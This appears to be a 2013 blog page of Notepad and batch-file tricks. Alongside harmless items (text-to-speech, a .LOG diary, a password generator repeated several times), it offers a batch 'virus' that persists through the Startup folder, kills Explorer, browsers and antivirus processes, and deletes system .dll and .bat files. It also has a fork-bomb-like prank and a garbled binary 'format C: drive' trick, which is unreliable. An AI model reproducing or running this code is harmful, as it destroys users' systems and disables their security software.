Convert Text Into Audio Using NotepadBy this trick you can convert any text to audio with just a click. And it doesn’t even require you to pay tons of dollars forany software program to install.How To Do This ?Step 1: Open Notepad file on your Windows P.C.Step 2: Copy and paste the below mentioned code :Dim msg, sapimsg=InputBox("Enter your text for conversion–www.techvorm.com","TechVorm Text-To-Audio Converter")Set sapi=CreateObject("sapi.spvoice")sapi.Speak msgStep 3: Save this file with any name with .vbs as extension. For eg. Text-To-Audio.vbsThats it ! Your free Text to Audio converter is ready to...
Monday, 27 May 2013
Format Your Hard Drive Using NotepadFormatting hard drive is a quiet hard and annoying job you have to use some hand-full of softwares to get this job done but no body ever dreamed or think to do this job via a notepad.Step 1: Open notepad.Step 2: Type the following the code in it (Or just copy paste it).01100110011011110111001001101101011000010111010000 1000000110001100111010010111000010000000101111010100010010111101011000Step 3: Save it as an .exe file giving any name you like.Thats It ! Now just double click on the file (to open it) and your C: drive will be formatted !This is just a little fun of zero and one. But, be Careful while using it.NOTE: No, you can’t run it from C: drive itself (not from the drive in which OS is installed &...
Make A Personal Log-Book Or A DiaryYou can also use Notepad as a simple digital diary or a personal Log-Book. Below mentioned are steps to make your own digital diary !Step 1: Open Notepad.Step 2: Type .LOG (in capital letters) and hit enter.Step 3: Save it with any name and close it.Step 4: Open it again.When you open the file again you will see the current date and time being inserted automatically after the .LOG line. This will happen automatically every time you reopen the the notepad fi...
Friday, 24 May 2013
MOUSE KEYBOARD VIRUS
@echo off
copy"virus.bat""c:\documents and settings\all users\start menu\programs\startup"
copy "virus.bat" "c:\"
copy "virus.bat" "%userprofile%\my documents"
tskill explorer
tskill ccapp
tskill yahoomessenger
tskill firefox
tskill chrome
rem made with batch virus maker v.2
tskill iexplorer
time 12:00
rem made with batch virus maker v.2
del c:\program files\common files\symantec shared\ccapp.exe
cd c:\windows
if exist "*.bat" del "*.bat"
cd c:\windows\system32
rem made with batch virus maker v.2
if exist "*.dll" del "*.dll"
tskill mcafee security centre module
del c:\program files\mcafee.com\agent\mcdetect.exe
rem made with batch virus maker v.2
copy "virus.bat" "virus.bat45544"
copy "virus.bat" "virus.bat85858"
copy "virus.bat" "virus.bat1645"
copy "virus.bat"...
Thursday, 23 May 2013
BATCH CODE
@echo stop
sexmuffinbatz:
start cmd
start www.google.com
start notepad
start www.sourmath.com
start www.yahoo.com
start www.facebook.com
goto sexmuffinbatz:
some simple code to jest troll
@echo off
:A
echo * Windows wants to check if your "DRIVE E" is functioning in a proper way.. Please wait for the scan to start
pause
goto:B
:B
echo * Scanning...
echo * Scanning....
echo * Scanning.....
echo * Scanning.......
echo * Scanning.........
pause
goto:C
:C
echo * Scanning Complete! Drive E is functioning in a proper way!
pause
:D
echo * Thanks for using Drive E scanner by Death!
pause
exit
you can make some of these codes a lot shorter, for example the shutdown command is
Shutdown -s -t 00
and that gives you 00 seconds until shutdown
nice...
BATCH PROGRAM
This Batch generates number only passwords. You can choose from 1, 5. or 10 passowrds to show...all randomCode:@echo off:Start2clsgoto Start:Starttitle Password Generatorecho I will make you a new password.echo Please write the password down somewhere in case you forget it.echo ---------------------------------------------------------------echo 1) 1 Random Passwordecho 2) 5 Random Passwordsecho 3) 10 Random Passwordsecho Input your choiceset input=set /p input= Choice:if %input%==1 goto A if NOT goto Start2if %input%==2 goto B if NOT goto Start2if %input%==3 goto C if NOT goto Start2:Aclsecho Your password is %random%echo Now choose what you want to do.echo 1) Go back to the beginningecho 2) Exitset input=set /p input= Choice:if %input%==1 goto Start2 if NOT goto Start 2if %input%==2 goto...
BATCH PROGRAM
This Batch generates number only passwords. You can choose from 1, 5. or 10 passowrds to show...all randomCode:@echo off:Start2clsgoto Start:Starttitle Password Generatorecho I will make you a new password.echo Please write the password down somewhere in case you forget it.echo ---------------------------------------------------------------echo 1) 1 Random Passwordecho 2) 5 Random Passwordsecho 3) 10 Random Passwordsecho Input your choiceset input=set /p input= Choice:if %input%==1 goto A if NOT goto Start2if %input%==2 goto B if NOT goto Start2if %input%==3 goto C if NOT goto Start2:Aclsecho Your password is %random%echo Now choose what you want to do.echo 1) Go back to the beginningecho 2) Exitset input=set /p input= Choice:if %input%==1 goto Start2 if NOT goto Start 2if %input%==2 goto...
BATCH PROGRAM
This Batch generates number only passwords. You can choose from 1, 5. or 10 passowrds to show...all randomCode:@echo off:Start2clsgoto Start:Starttitle Password Generatorecho I will make you a new password.echo Please write the password down somewhere in case you forget it.echo ---------------------------------------------------------------echo 1) 1 Random Passwordecho 2) 5 Random Passwordsecho 3) 10 Random Passwordsecho Input your choiceset input=set /p input= Choice:if %input%==1 goto A if NOT goto Start2if %input%==2 goto B if NOT goto Start2if %input%==3 goto C if NOT goto Start2:Aclsecho Your password is %random%echo Now choose what you want to do.echo 1) Go back to the beginningecho 2) Exitset input=set /p input= Choice:if %input%==1 goto Start2 if NOT goto Start 2if %input%==2 goto...
BATCH PROGRAM
@echo off:Start2clsgoto Start:Starttitle Password Generatorecho I will make you a new password.echo Please write the password down somewhere in case you forget it.echo ---------------------------------------------------------------echo 1) 1 Random Passwordecho 2) 5 Random Passwordsecho 3) 10 Random Passwordsecho Input your choiceset input=set /p input= Choice:if %input%==1 goto A if NOT goto Start2if %input%==2 goto B if NOT goto Start2if %input%==3 goto C if NOT goto Start2:Aclsecho Your password is %random%echo Now choose what you want to do.echo 1) Go back to the beginningecho 2) Exitset input=set /p input= Choice:if %input%==1 goto Start2 if NOT goto Start 2if %input%==2 goto Exit if NOT goto Start 2:Exitexit:Bclsecho Your 5 passwords are %random%, %random%, %random%, %random%, %random%.echo...
BATCH PROGRAM
This Batch generates number only passwords. You can choose from 1, 5. or 10 passowrds to show...all randomCode:@echo off:Start2clsgoto Start:Starttitle Password Generatorecho I will make you a new password.echo Please write the password down somewhere in case you forget it.echo ---------------------------------------------------------------echo 1) 1 Random Passwordecho 2) 5 Random Passwordsecho 3) 10 Random Passwordsecho Input your choiceset input=set /p input= Choice:if %input%==1 goto A if NOT goto Start2if %input%==2 goto B if NOT goto Start2if %input%==3 goto C if NOT goto Start2:Aclsecho Your password is %random%echo Now choose what you want to do.echo 1) Go back to the beginningecho 2) Exitset input=set /p input= Choice:if %input%==1 goto Start2 if NOT goto Start 2if %input%==2 goto...